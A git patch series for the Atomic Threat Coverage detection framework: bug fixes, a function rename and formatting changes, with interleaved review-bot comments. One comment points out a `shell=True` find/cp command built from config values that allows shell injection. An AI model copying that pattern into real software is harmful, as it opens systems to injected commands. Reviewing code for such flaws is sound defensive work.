From 9e21a0f898d85427d0612272bf64dee266918911 Mon Sep 17 00:00:00 2001
From: DemonWareXT
Date: Wed, 25 May 2022 09:24:44 +0200
Subject: [PATCH 1/4] changed if statement to not fail when variable is unassigned

---
 scripts/es_index_export.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/scripts/es_index_export.py b/scripts/es_index_export.py
index 83763844..de538590 100755
--- a/scripts/es_index_export.py
+++ b/scripts/es_index_export.py
@@ -133,7 +133,7 @@ def __init__(self):
 except:
 pass
 
-if not date_created:
+if not "date_created" in locals():
 try:
 # in case somebody mixed up month and date, like in "Detection of SafetyKatz"
 date_created = datetime.datetime.strptime(alert['date'], '%Y/%d/%m').isoformat()
@@ -154,7 +154,7 @@ def __init__(self):
 except:
 pass
 
-if not date_modified:
+if not "date_modified" in locals():
 try:
 # in case somebody mixed up month and date, like in "Detection of SafetyKatz"
 date_modified = datetime.datetime.strptime(alert['modified'], '%Y/%d/%m').isoformat()
From bd821c068adf3e17fff6339dacf11716e4db8b14 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?L=C3=A4ubli=20Linus=20=28laei=29?=
Date: Wed, 25 May 2022 10:57:56 +0200
Subject: [PATCH 2/4] changed function name

---
 scripts/atcutils.py | 113 ++++++++++++++++++-------------------
 scripts/detectionrule.py | 4 +-
 scripts/es_index_export.py | 2 +-
 3 files changed, 57 insertions(+), 62 deletions(-)

diff --git a/scripts/atcutils.py b/scripts/atcutils.py
index 5d3ed039..4cf834a8 100755
--- a/scripts/atcutils.py
+++ b/scripts/atcutils.py
@@ -28,7 +28,7 @@ DEFAULT_PROJECT_CONFIG_PATH = 'scripts/config.default.yml' DEFAULT_CONFIG_PATH = 'config.yml'
-#Show warnings only once:
+# Show warnings only once:
 with warnings.catch_warnings():
 warnings.simplefilter("once")
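Review bot: `"date_created" in locals()` only reports whether the name has ever been bound in this scope, so when this block runs again for a later alert (the `alert[...]` lookups suggest a loop inside `__init__`) the value left from the previous alert satisfies the test, the fallback `strptime` is skipped, and the earlier alert's date is carried over silently. Binding the name before the first `try` and keeping the original value test avoids both the NameError the commit is fixing and the stale-value case: `date_created = None` ahead of the first `try:` and `if not date_created:` as before. The `date_modified` hunk that follows has the same problem and the same fix. If the `locals()` probe is kept, `"date_created" not in locals()` is the idiomatic spelling. `__init__` begins and ends outside both hunks.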
@@ -125,10 +125,11 @@ def __read_yaml_file(self, path): def get(self, key): """ Maps to 'get' Function of configuration {dict} object """ return self.config.get(key) - + config_local = property(get_config_local, set_config_local) config_project = property(get_config_project, set_config_project) + ## Initialize global config ATCconfig = ATCConfig() @@ -150,14 +151,13 @@ def read_rule_file(path): return rule_text @staticmethod - def get_normalized_field(field): + def get_normalized_field(field): # return everything before field modifier (pipe) regex = '^(.*?)\|' try: return re.search(regex, field).group(1) except: return field - @staticmethod def read_yaml_file(path): @@ -181,7 +181,7 @@ def read_yaml_file(path): else: result = buff_results[0] return result - + @staticmethod def load_config(path): """Load the configuration YAML files used ofr ATC into a dictionary @@ -203,7 +203,7 @@ def load_yamls(path): join(path, f) for f in listdir(path) if isfile(join(path, f)) if f.endswith('.yaml') - or f.endswith('.yml') + or f.endswith('.yml') ] result = [] @@ -249,7 +249,7 @@ def confluence_get_page_id(apipath, auth, space, title): url = apipath + "content" space_page_url = url + '?spaceKey=' + space + '&title=' \ - + title + '&expand=space' + + title + '&expand=space' response = requests.request( "GET", @@ -354,14 +354,14 @@ def push_to_confluence(data, apipath, auth): current_content = resp["body"]["storage"]["value"] - #if current_content == data["confluencecontent"]: + # if current_content == data["confluencecontent"]: # compare pages: revert changes in confluence page, remove \n \r \t \s conv = { ']*>': '', ']*>': '', ']*>': '', - '’': '’', - 'Ä€': 'Ā', + '’': '’', + 'Ä€': 'Ā', '\n': '', '\r': '', '\t': '', 
@@ -430,7 +430,7 @@ def sigma_lgsrc_fields_to_names(logsource_dict): """Get sigma logsource dict and rename key/values into our model, so we could use it for Data Needed calculation""" if logsource_dict: - + sigma_keys = [*sigma_mapping] proper_logsource_dict = {} for key, val in logsource_dict.items(): @@ -457,7 +457,7 @@ def sigma_lgsrc_fields_to_names(logsource_dict): proper_logsource_dict.update([ (key, val) ]) - + return proper_logsource_dict else: return {} @@ -480,7 +480,7 @@ def search_for_fields(detection_dict): continue for val in detection_dict[_field]: - if isinstance(val,str): + if isinstance(val, str): continue if isinstance( detection_dict[_field], @@ -584,18 +584,18 @@ def check_for_command_line_in_selection(detection_dict): if isinstance(_field, str): _field = ATCutils.get_normalized_field(_field) if _field == 'CommandLine' or \ - _field == 'ProcessCommandLine' or \ - _field == 'ProcesssCommandLine' or \ - _field == 'ParentCommandLine': - return True + _field == 'ProcessCommandLine' or \ + _field == 'ProcesssCommandLine' or \ + _field == 'ParentCommandLine': + return True if isinstance(_field, dict): for item in _field: item = ATCutils.get_normalized_field(item) - if item == 'CommandLine' or \ - item == 'ProcessCommandLine' or \ - item == 'ProcesssCommandLine' or \ - item == 'ParentCommandLine': + if item == 'CommandLine' or \ + item == 'ProcessCommandLine' or \ + item == 'ProcesssCommandLine' or \ + item == 'ParentCommandLine': return True return False @@ -627,7 +627,6 @@ def check_for_enrichment_presence(detection_rule_obj): else: return False - @staticmethod def get_logsource_of_the_document(detection_rule_obj): """get logsource for specific document (addition)""" 
@@ -646,9 +645,8 @@ def get_logsource_of_the_document(detection_rule_obj): return logsource - @staticmethod - def main_dn_calculatoin_func(dr_file_path): + def main_dn_calculation_func(dr_file_path): """you need to execute this function to calculate DN for DR file""" dn_list = ATCutils.load_yamls(ATCconfig.get('data_needed_dir')) @@ -659,7 +657,7 @@ def main_dn_calculatoin_func(dr_file_path): """For every Detection Rule we do: * calculate Date Needed per logsource or per logsource AND per selection) - it depentd on presence of event ID in the document + it depends on presence of event ID in the document - if there is event id for specific logsource — we calculate Data Needed Per SELECTION - if there is no event id for specific document — we calculate @@ -685,7 +683,7 @@ def main_dn_calculatoin_func(dr_file_path): if not detectionrule.get('additions'): logsource = ATCutils.get_logsource_of_the_document(detectionrule) - + event_id_based_dr = ATCutils.check_for_event_ids_presence(detectionrule) # if this is event id based detection rule we calculate PER SELECTION @@ -702,7 +700,7 @@ def main_dn_calculatoin_func(dr_file_path): has_command_line = \ ATCutils.check_for_command_line_in_selection( detectionrule['detection'][_field] - ) + ) final_list += ATCutils.calculate_dn_for_eventid_based_dr( dn_list, logsource, event_ids, has_command_line ) @@ -719,11 +717,11 @@ def main_dn_calculatoin_func(dr_file_path): continue try: - detection_fields = ATCutils\ - .search_for_fields2(detectionrule['detection'][_field]) + detection_fields = ATCutils \ + .search_for_fields2(detectionrule['detection'][_field]) except Exception as e: - detection_fields = ATCutils\ - .search_for_fields(detectionrule['detection']) + detection_fields = ATCutils \ + .search_for_fields(detectionrule['detection']) if detection_fields: for field in detection_fields: 
@@ -759,12 +757,12 @@ def main_dn_calculatoin_func(dr_file_path): # check if first document has logsource logsource = ATCutils.get_logsource_of_the_document(detectionrule) if logsource: - + event_id_based_dr = ATCutils.check_for_event_ids_presence(detectionrule) if event_id_based_dr: if detectionrule.get('detection'): - # just in case there are multiple selections in first document + # just in case there are multiple selections in first document for _field in detectionrule.get('detection'): if str(_field) in ["condition", "timeframe"]: @@ -776,9 +774,9 @@ def main_dn_calculatoin_func(dr_file_path): has_command_line = \ ATCutils.check_for_command_line_in_selection( detectionrule['detection'][_field] - ) + ) final_list += ATCutils.calculate_dn_for_eventid_based_dr( - dn_list, logsource, event_ids, has_command_line + dn_list, logsource, event_ids, has_command_line ) else: full_list_of_fields = [] @@ -791,11 +789,11 @@ def main_dn_calculatoin_func(dr_file_path): continue try: - detection_fields = ATCutils\ - .search_for_fields2(detectionrule['detection'][_field]) + detection_fields = ATCutils \ + .search_for_fields2(detectionrule['detection'][_field]) except Exception as e: - detection_fields = ATCutils\ - .search_for_fields(detectionrule['detection']) + detection_fields = ATCutils \ + .search_for_fields(detectionrule['detection']) if detection_fields: for field in detection_fields: @@ -805,12 +803,11 @@ def main_dn_calculatoin_func(dr_file_path): final_list += ATCutils.calculate_dn_for_non_eventid_based_dr( dn_list, full_list_of_fields, logsource) - # then let's calculate Data Needed per EACH SELECTION of different logsources for addition in detectionrule['additions']: logsource = ATCutils.get_logsource_of_the_document(addition) - + event_id_based_dr = ATCutils.check_for_event_ids_presence(addition) if event_id_based_dr: 
@@ -825,9 +822,9 @@ def main_dn_calculatoin_func(dr_file_path): has_command_line = \ ATCutils.check_for_command_line_in_selection( addition['detection'][_field] - ) + ) final_list += ATCutils.calculate_dn_for_eventid_based_dr( - dn_list, logsource, event_ids, has_command_line + dn_list, logsource, event_ids, has_command_line ) else: full_list_of_fields = [] @@ -836,17 +833,17 @@ def main_dn_calculatoin_func(dr_file_path): if addition.get('detection'): # just in case there are multiple selections in first document for _field in addition['detection']: - + if str(_field) in ["condition", "timeframe"]: continue - + try: - detection_fields = ATCutils\ - .search_for_fields2(addition['detection'][_field]) + detection_fields = ATCutils \ + .search_for_fields2(addition['detection'][_field]) except Exception as e: - detection_fields = ATCutils\ - .search_for_fields(addition['detection']) - + detection_fields = ATCutils \ + .search_for_fields(addition['detection']) + if detection_fields: for field in detection_fields: if field not in full_list_of_fields: @@ -888,13 +885,12 @@ def calculate_dn_for_eventid_based_dr( if 'platform' in x and 'channel' in x: if x.get('platform') == y.get('platform') and x.get( - 'channel') == y.get('channel'): + 'channel') == y.get('channel'): list_of_DN_matched_by_logsource.append(dn) else: if x.get('platform') == y.get('platform'): list_of_DN_matched_by_logsource.append(dn) - # find all Data Needed which matched by logsource section from # Detection Rule AND EventID 
@@ -906,14 +902,14 @@ def calculate_dn_for_eventid_based_dr( eventID_from_title = "None" if has_command_line == True and dn['title'] == \ - "DN_0001_4688_windows_process_creation": + "DN_0001_4688_windows_process_creation": continue if isinstance(event_ids, list): for eid in event_ids: if eventID_from_title == str(eid): - list_of_DN_matched_by_logsource_and_eventid\ + list_of_DN_matched_by_logsource_and_eventid \ .append(dn) elif eventID_from_title == str(event_ids): list_of_DN_matched_by_logsource_and_eventid.append(dn) @@ -958,7 +954,6 @@ def calculate_dn_for_non_eventid_based_dr( # if they are equal, do.. list_of_DN_matched_by_fields.append(dn) - for matched_dn in list_of_DN_matched_by_fields: y = matched_dn @@ -967,11 +962,11 @@ def calculate_dn_for_non_eventid_based_dr( if x.get('category') == "process_creation": # should take care about unix events in future: todo if x.get('platform') == y.get('platform') and "process_creation" \ - in y.get('title'): + in y.get('title'): list_of_DN_matched_by_fields_and_logsource.append(matched_dn) elif 'platform' in x and 'channel' in x: if x.get('platform') == y.get('platform') and x.get( - 'channel') == y.get('channel'): + 'channel') == y.get('channel'): list_of_DN_matched_by_fields_and_logsource.append(matched_dn) else: if x.get('platform') == y.get('platform'): @@ -992,9 +987,9 @@ def write_file(path, content, options="w+"): @staticmethod def populate_tg_markdown( art_dir='../' + - read_yaml_file.__func__('config.yml').get('triggers_directory'), + read_yaml_file.__func__('config.yml').get('triggers_directory'), atc_dir='../' + - read_yaml_file.__func__('config.yml').get('md_name_of_root_directory')): + read_yaml_file.__func__('config.yml').get('md_name_of_root_directory')): cmd = ('find \'%s/\' -name "T*.md" -exec' + ' cp {} \'%sTriggers/\' \;') % (art_dir, atc_dir) if subprocess.run(cmd, shell=True, check=True).returncode == 0: 
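Review bot: The re-indented default arguments `art_dir` and `atc_dir` are read from `config.yml` once at class-definition time and then interpolated into a `shell=True` command string at the end of the hunk, so a configured directory name containing a quote or other shell metacharacter changes the structure of the `find`/`cp` command instead of being treated as a path. Passing the command as an argument list keeps the shell out of the path entirely: `subprocess.run(['find', art_dir + '/', '-name', 'T*.md', '-exec', 'cp', '{}', atc_dir + 'Triggers/', ';'], check=True)`. That also drops the `'\;'` sequence in the existing string, which is not a valid Python escape and is reported as a SyntaxWarning from Python 3.12. The body of `populate_tg_markdown` continues past the hunk.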
diff --git a/scripts/detectionrule.py b/scripts/detectionrule.py index 43b1ee39..153db018 100755 --- a/scripts/detectionrule.py +++ b/scripts/detectionrule.py @@ -121,7 +121,7 @@ def render_template(self, template_type): self.fields.update({"queries": queries}) # Data Needed - data_needed = ATCutils.main_dn_calculatoin_func(self.yaml_file) + data_needed = ATCutils.main_dn_calculation_func(self.yaml_file) # if there is only 1 element in the list, print it as a string, # without quotes @@ -266,7 +266,7 @@ def render_template(self, template_type): self.fields.update({"queries": queries}) # Data Needed - data_needed = ATCutils.main_dn_calculatoin_func(self.yaml_file) + data_needed = ATCutils.main_dn_calculation_func(self.yaml_file) data_needed_with_id = [] diff --git a/scripts/es_index_export.py b/scripts/es_index_export.py index de538590..26bad421 100755 --- a/scripts/es_index_export.py +++ b/scripts/es_index_export.py @@ -106,7 +106,7 @@ def __init__(self): enrichments = [er for er in enrichments_list if er['title'] in alert.get('enrichment', [{'title':'-'}])] if len(enrichments) < 1: enrichments = [{'title': 'not defined'}] - dn_titles = ATCutils.main_dn_calculatoin_func(path) + dn_titles = ATCutils.main_dn_calculation_func(path) alert_dns = [data for data in dn_list if data['title'] in dn_titles] if len(alert_dns) < 1: alert_dns = [{'category': 'not defined', From c25f9252378b8cb11c27f574db216706a60f7263 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A4ubli=20Linus=20=28laei=29?= Date: Wed, 25 May 2022 11:06:23 +0200 Subject: [PATCH 3/4] optimised formatting --- main.py | 39 +++++++++++++++++++-------------------- 1 file changed, 19 insertions(+), 20 deletions(-) diff --git a/main.py b/main.py index cfaba264..ff11ec3c 100755 --- a/main.py +++ b/main.py 
@@ -97,14 +97,13 @@ group2.add_argument('-UC', '--usecases', action='store_true', help='Build response use case part') - # Init capabilities parser.add_argument('-i', '--init', action='store_true', help="Build initial pages or directories " + - "depending on the export type") + "depending on the export type") # Input parser.add_argument('--vis-input', help="Provide input file for " + - "visualisations module") + "visualisations module") # Output parser.add_argument('--vis-output-dir', help=""" Provide directory path where to save output for visualisations module. @@ -114,16 +113,16 @@ ${exported_analytics_directory}/dashboards/ """) parser.add_argument('--vis-output-file-name', help="Provide file name " + - "which will be used to save a file in output " + - "directory\nDefault is: [randomstring].yml") + "which will be used to save a file in output " + + "directory\nDefault is: [randomstring].yml") # Force parser.add_argument('--vis-force', action='store_true', help="Force visualisations module to not use Kibana") # Export type parser.add_argument('--vis-export-type', help="Switch JSON export type " + - "from api (uploaded using curl) to gui (imported in " + - "kibana)", required=False, default="api", const="gui", + "from api (uploaded using curl) to gui (imported in " + + "kibana)", required=False, default="api", const="gui", action="store_const") args = parser.parse_args() 
@@ -132,13 +131,13 @@ UpdateAttackMapping() PopulateMarkdown(auto=args.auto, ms=args.mitigationsystem, mp=args.mitigationpolicy, dr=args.detectionrule, - tg=args.triggers, cu=args.customers, uc=args.usecases, - hp=args.hardeningpolicy,init=args.init) + tg=args.triggers, cu=args.customers, uc=args.usecases, + hp=args.hardeningpolicy, init=args.init) ReactPopulateMarkdown(auto=args.auto, ra=args.responseactions, rp=args.responseplaybook, rs=args.responsestage, init=args.init) DataPopulateMarkdown(auto=args.auto, lp=args.loggingpolicy, - dn=args.dataneeded,en=args.enrichment, + dn=args.dataneeded, en=args.enrichment, init=args.init) elif args.confluence: @@ -150,13 +149,13 @@ auth = HTTPBasicAuth(mail, password) UpdateAttackMapping() DataPopulateConfluence(auth=auth, auto=args.auto, lp=args.loggingpolicy, - dn=args.dataneeded,en=args.enrichment, - init=args.init) - PopulateConfluence(auth=auth, auto=args.auto, ms=args.mitigationsystem, - mp=args.mitigationpolicy, dr=args.detectionrule, - tg=args.triggers, cu=args.customers, uc=args.usecases, - hp=args.hardeningpolicy, init=args.init) - ReactPopulateConfluence(auth=auth, auto=args.auto, + dn=args.dataneeded, en=args.enrichment, + init=args.init) + PopulateConfluence(auth=auth, auto=args.auto, ms=args.mitigationsystem, + mp=args.mitigationpolicy, dr=args.detectionrule, + tg=args.triggers, cu=args.customers, uc=args.usecases, + hp=args.hardeningpolicy, init=args.init) + ReactPopulateConfluence(auth=auth, auto=args.auto, ra=args.responseactions, rp=args.responseplaybook, rs=args.responsestage, init=args.init) elif args.react_stix: @@ -209,7 +208,7 @@ file[:-4] + ".json", args.vis_force, args.vis_export_type) print("File path: %s" % (output_path + "_" + - file[:-4] + ".json")) + file[:-4] + ".json")) else: YamlHandler(args.vis_input, output_path2 + ".json", args.vis_force, args.vis_export_type) 
@@ -222,8 +221,8 @@ print("HINT: Make sure proper directories are " + "configured in the config.yml") if ATCconfig.get( - 'response_playbooks_dir', - ATCconfig2.get('response_playbooks_dir')) and \ + 'response_playbooks_dir', + ATCconfig2.get('response_playbooks_dir')) and \ ATCconfig.get( 'response_actions_dir', ATCconfig2.get('response_actions_dir')) and \ From 3ce60b23787b3beb5c66580d52e038341805499a Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?L=C3=A4ubli=20Linus=20=28laei=29?= Date: Wed, 25 May 2022 13:04:59 +0200 Subject: [PATCH 4/4] reformatted code --- .travis.yml | 2 +- Atomic_Threat_Coverage/Triggers/T1002.md | 106 +- Atomic_Threat_Coverage/Triggers/T1003.md | 477 +- Atomic_Threat_Coverage/Triggers/T1004.md | 55 +- Atomic_Threat_Coverage/Triggers/T1005.md | 26 +- Atomic_Threat_Coverage/Triggers/T1007.md | 36 +- Atomic_Threat_Coverage/Triggers/T1009.md | 25 +- Atomic_Threat_Coverage/Triggers/T1010.md | 29 +- Atomic_Threat_Coverage/Triggers/T1012.md | 25 +- Atomic_Threat_Coverage/Triggers/T1014.md | 49 +- Atomic_Threat_Coverage/Triggers/T1015.md | 49 +- Atomic_Threat_Coverage/Triggers/T1016.md | 94 +- Atomic_Threat_Coverage/Triggers/T1018.md | 145 +- Atomic_Threat_Coverage/Triggers/T1022.md | 66 +- Atomic_Threat_Coverage/Triggers/T1023.md | 36 +- Atomic_Threat_Coverage/Triggers/T1027.md | 83 +- Atomic_Threat_Coverage/Triggers/T1028.md | 81 +- Atomic_Threat_Coverage/Triggers/T1030.md | 16 +- Atomic_Threat_Coverage/Triggers/T1031.md | 25 +- Atomic_Threat_Coverage/Triggers/T1032.md | 17 +- Atomic_Threat_Coverage/Triggers/T1033.md | 42 +- Atomic_Threat_Coverage/Triggers/T1035.md | 46 +- Atomic_Threat_Coverage/Triggers/T1036.md | 161 +- Atomic_Threat_Coverage/Triggers/T1037.md | 116 +- Atomic_Threat_Coverage/Triggers/T1038.md | 40 +- Atomic_Threat_Coverage/Triggers/T1040.md | 70 +- Atomic_Threat_Coverage/Triggers/T1042.md | 28 +- Atomic_Threat_Coverage/Triggers/T1044.md | 62 +- Atomic_Threat_Coverage/Triggers/T1046.md | 40 +- Atomic_Threat_Coverage/Triggers/T1047.md | 103 +- Atomic_Threat_Coverage/Triggers/T1048.md | 104 +- Atomic_Threat_Coverage/Triggers/T1049.md | 58 +- Atomic_Threat_Coverage/Triggers/T1050.md | 56 +- Atomic_Threat_Coverage/Triggers/T1053.md | 67 +- Atomic_Threat_Coverage/Triggers/T1055.md | 148 +- Atomic_Threat_Coverage/Triggers/T1056.md | 34 +- Atomic_Threat_Coverage/Triggers/T1057.md | 37 +- Atomic_Threat_Coverage/Triggers/T1058.md | 29 +- 
Atomic_Threat_Coverage/Triggers/T1059.md | 25 +- Atomic_Threat_Coverage/Triggers/T1060.md | 81 +- Atomic_Threat_Coverage/Triggers/T1062.md | 20 +- Atomic_Threat_Coverage/Triggers/T1063.md | 78 +- Atomic_Threat_Coverage/Triggers/T1064.md | 50 +- Atomic_Threat_Coverage/Triggers/T1065.md | 34 +- Atomic_Threat_Coverage/Triggers/T1069.md | 85 +- Atomic_Threat_Coverage/Triggers/T1070.md | 134 +- Atomic_Threat_Coverage/Triggers/T1071.md | 142 +- Atomic_Threat_Coverage/Triggers/T1073.md | 29 +- Atomic_Threat_Coverage/Triggers/T1074.md | 53 +- Atomic_Threat_Coverage/Triggers/T1075.md | 40 +- Atomic_Threat_Coverage/Triggers/T1076.md | 59 +- Atomic_Threat_Coverage/Triggers/T1077.md | 77 +- Atomic_Threat_Coverage/Triggers/T1081.md | 67 +- Atomic_Threat_Coverage/Triggers/T1082.md | 128 +- Atomic_Threat_Coverage/Triggers/T1083.md | 65 +- Atomic_Threat_Coverage/Triggers/T1084.md | 16 +- Atomic_Threat_Coverage/Triggers/T1085.md | 126 +- Atomic_Threat_Coverage/Triggers/T1086.md | 219 +- Atomic_Threat_Coverage/Triggers/T1087.md | 175 +- Atomic_Threat_Coverage/Triggers/T1088.md | 122 +- Atomic_Threat_Coverage/Triggers/T1089.md | 322 +- Atomic_Threat_Coverage/Triggers/T1090.md | 46 +- Atomic_Threat_Coverage/Triggers/T1093.md | 17 +- Atomic_Threat_Coverage/Triggers/T1095.md | 61 +- Atomic_Threat_Coverage/Triggers/T1096.md | 35 +- Atomic_Threat_Coverage/Triggers/T1097.md | 30 +- Atomic_Threat_Coverage/Triggers/T1098.md | 31 +- Atomic_Threat_Coverage/Triggers/T1099.md | 128 +- Atomic_Threat_Coverage/Triggers/T1100.md | 26 +- Atomic_Threat_Coverage/Triggers/T1101.md | 17 +- Atomic_Threat_Coverage/Triggers/T1102.md | 41 +- Atomic_Threat_Coverage/Triggers/T1103.md | 43 +- Atomic_Threat_Coverage/Triggers/T1105.md | 162 +- Atomic_Threat_Coverage/Triggers/T1107.md | 194 +- Atomic_Threat_Coverage/Triggers/T1110.md | 44 +- Atomic_Threat_Coverage/Triggers/T1112.md | 113 +- Atomic_Threat_Coverage/Triggers/T1113.md | 59 +- Atomic_Threat_Coverage/Triggers/T1114.md | 36 +- 
Atomic_Threat_Coverage/Triggers/T1115.md | 34 +- Atomic_Threat_Coverage/Triggers/T1117.md | 81 +- Atomic_Threat_Coverage/Triggers/T1118.md | 167 +- Atomic_Threat_Coverage/Triggers/T1119.md | 62 +- Atomic_Threat_Coverage/Triggers/T1121.md | 55 +- Atomic_Threat_Coverage/Triggers/T1123.md | 19 +- Atomic_Threat_Coverage/Triggers/T1124.md | 38 +- Atomic_Threat_Coverage/Triggers/T1126.md | 48 +- Atomic_Threat_Coverage/Triggers/T1127.md | 66 +- Atomic_Threat_Coverage/Triggers/T1128.md | 25 +- Atomic_Threat_Coverage/Triggers/T1130.md | 35 +- Atomic_Threat_Coverage/Triggers/T1132.md | 17 +- Atomic_Threat_Coverage/Triggers/T1135.md | 82 +- Atomic_Threat_Coverage/Triggers/T1136.md | 89 +- Atomic_Threat_Coverage/Triggers/T1137.md | 72 +- Atomic_Threat_Coverage/Triggers/T1138.md | 67 +- Atomic_Threat_Coverage/Triggers/T1139.md | 17 +- Atomic_Threat_Coverage/Triggers/T1140.md | 48 +- Atomic_Threat_Coverage/Triggers/T1141.md | 36 +- Atomic_Threat_Coverage/Triggers/T1142.md | 31 +- Atomic_Threat_Coverage/Triggers/T1143.md | 32 +- Atomic_Threat_Coverage/Triggers/T1144.md | 33 +- Atomic_Threat_Coverage/Triggers/T1145.md | 71 +- Atomic_Threat_Coverage/Triggers/T1146.md | 81 +- Atomic_Threat_Coverage/Triggers/T1147.md | 17 +- Atomic_Threat_Coverage/Triggers/T1148.md | 27 +- Atomic_Threat_Coverage/Triggers/T1150.md | 20 +- Atomic_Threat_Coverage/Triggers/T1151.md | 19 +- Atomic_Threat_Coverage/Triggers/T1152.md | 19 +- Atomic_Threat_Coverage/Triggers/T1153.md | 32 +- Atomic_Threat_Coverage/Triggers/T1154.md | 16 +- Atomic_Threat_Coverage/Triggers/T1155.md | 29 +- Atomic_Threat_Coverage/Triggers/T1156.md | 38 +- Atomic_Threat_Coverage/Triggers/T1158.md | 189 +- Atomic_Threat_Coverage/Triggers/T1159.md | 25 +- Atomic_Threat_Coverage/Triggers/T1160.md | 23 +- Atomic_Threat_Coverage/Triggers/T1163.md | 19 +- Atomic_Threat_Coverage/Triggers/T1164.md | 34 +- Atomic_Threat_Coverage/Triggers/T1165.md | 21 +- Atomic_Threat_Coverage/Triggers/T1166.md | 50 +- 
Atomic_Threat_Coverage/Triggers/T1168.md | 70 +- Atomic_Threat_Coverage/Triggers/T1169.md | 19 +- Atomic_Threat_Coverage/Triggers/T1170.md | 73 +- Atomic_Threat_Coverage/Triggers/T1173.md | 39 +- Atomic_Threat_Coverage/Triggers/T1174.md | 32 +- Atomic_Threat_Coverage/Triggers/T1176.md | 53 +- Atomic_Threat_Coverage/Triggers/T1179.md | 46 +- Atomic_Threat_Coverage/Triggers/T1180.md | 26 +- Atomic_Threat_Coverage/Triggers/T1183.md | 62 +- Atomic_Threat_Coverage/Triggers/T1191.md | 57 +- Atomic_Threat_Coverage/Triggers/T1193.md | 27 +- Atomic_Threat_Coverage/Triggers/T1196.md | 32 +- Atomic_Threat_Coverage/Triggers/T1197.md | 60 +- Atomic_Threat_Coverage/Triggers/T1201.md | 112 +- Atomic_Threat_Coverage/Triggers/T1202.md | 39 +- Atomic_Threat_Coverage/Triggers/T1204.md | 94 +- Atomic_Threat_Coverage/Triggers/T1206.md | 45 +- Atomic_Threat_Coverage/Triggers/T1207.md | 29 +- Atomic_Threat_Coverage/Triggers/T1208.md | 38 +- Atomic_Threat_Coverage/Triggers/T1214.md | 29 +- Atomic_Threat_Coverage/Triggers/T1215.md | 26 +- Atomic_Threat_Coverage/Triggers/T1216.md | 52 +- Atomic_Threat_Coverage/Triggers/T1217.md | 83 +- Atomic_Threat_Coverage/Triggers/T1218.md | 186 +- Atomic_Threat_Coverage/Triggers/T1219.md | 28 +- Atomic_Threat_Coverage/Triggers/T1220.md | 104 +- Atomic_Threat_Coverage/Triggers/T1222.md | 242 +- Atomic_Threat_Coverage/Triggers/T1223.md | 42 +- Atomic_Threat_Coverage/Triggers/T1482.md | 42 +- Atomic_Threat_Coverage/Triggers/T1485.md | 58 +- Atomic_Threat_Coverage/Triggers/T1489.md | 71 +- Atomic_Threat_Coverage/Triggers/T1490.md | 121 +- Atomic_Threat_Coverage/Triggers/T1496.md | 22 +- Atomic_Threat_Coverage/Triggers/T1500.md | 28 +- Atomic_Threat_Coverage/Triggers/T1501.md | 37 +- Atomic_Threat_Coverage/Triggers/T1502.md | 40 +- Atomic_Threat_Coverage/Triggers/T1504.md | 34 +- Atomic_Threat_Coverage/Triggers/T1505.md | 57 +- CONTRIBUTING.md | 36 +- DEVELOP.md | 40 +- README.md | 242 +- README_PL.md | 231 +- README_RU.md | 301 +- 
analytics/generated/atc_es_index.json | 29204 +++++++++++++++- .../atc_attack_navigator_profile.json | 5249 ++- ...avigator_profile_CU_0001_TESTCUSTOMER.json | 174 +- ...vigator_profile_CU_0002_TESTCUSTOMER2.json | 111 +- .../generated/react_navigator_profile.json | 1019 +- .../RP_0001_phishing_email.json | 266 +- .../predefined/atc-analytics-dashboard.json | 5 +- .../atc-analytics-index-pattern.json | 12 +- .../atc-analytics-index-template.json | 98 +- mkdocs.yml | 18 +- scripts/amitt_mapping.py | 2 +- .../atc_visualizations/DEVELOPMENT_README.md | 20 +- scripts/atc_visualizations/README.md | 37 +- scripts/atc_visualizations/TODO.md | 2 +- scripts/atc_visualizations/aggs.py | 20 +- scripts/atc_visualizations/base.py | 8 +- scripts/atc_visualizations/dashboard.py | 8 +- scripts/atc_visualizations/kibana_api.py | 2 +- scripts/atc_visualizations/metrics.py | 11 + scripts/atc_visualizations/params.py | 1 + scripts/atc_visualizations/visualisation.py | 39 +- scripts/atc_visualizations/yaml_handler.py | 8 +- scripts/attack_mapping.py | 2 +- scripts/attack_navigator_export.py | 24 +- .../attack_navigator_per_customer_export.py | 29 +- scripts/customer.py | 7 +- scripts/detectionrule.py | 69 +- scripts/es_index_export.py | 133 +- scripts/hardeningpolicy.py | 16 +- scripts/init_confluence.py | 7 +- scripts/init_markdown.py | 2 +- scripts/mitigationpolicy.py | 7 +- scripts/mitigationsystem.py | 3 +- scripts/populateconfluence.py | 42 +- scripts/populatemarkdown.py | 4 +- scripts/triggers.py | 5 +- scripts/update_amitt_mapping.py | 5 +- scripts/update_attack_mapping.py | 5 +- scripts/usecases.py | 9 +- tests/conftest.py | 1 - tests/test_syntax.py | 1 - 202 files changed, 40099 insertions(+), 7488 deletions(-) diff --git a/.travis.yml b/.travis.yml index 46782a63..738f0ff3 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,7 +1,7 @@ dist: xenial language: python python: - - "3.7" + - "3.7" install: pip install -r requirements.txt 
diff --git a/Atomic_Threat_Coverage/Triggers/T1002.md b/Atomic_Threat_Coverage/Triggers/T1002.md index 7e527c7b..96624c02 100644 --- a/Atomic_Threat_Coverage/Triggers/T1002.md +++ b/Atomic_Threat_Coverage/Triggers/T1002.md @@ -1,5 +1,7 @@ # T1002 - Data Compressed + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002) +
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
## Atomic Tests @@ -14,54 +16,48 @@ - [Atomic Test #5 - Data Compressed - nix - tar Folder or File](#atomic-test-5---data-compressed---nix---tar-folder-or-file) -
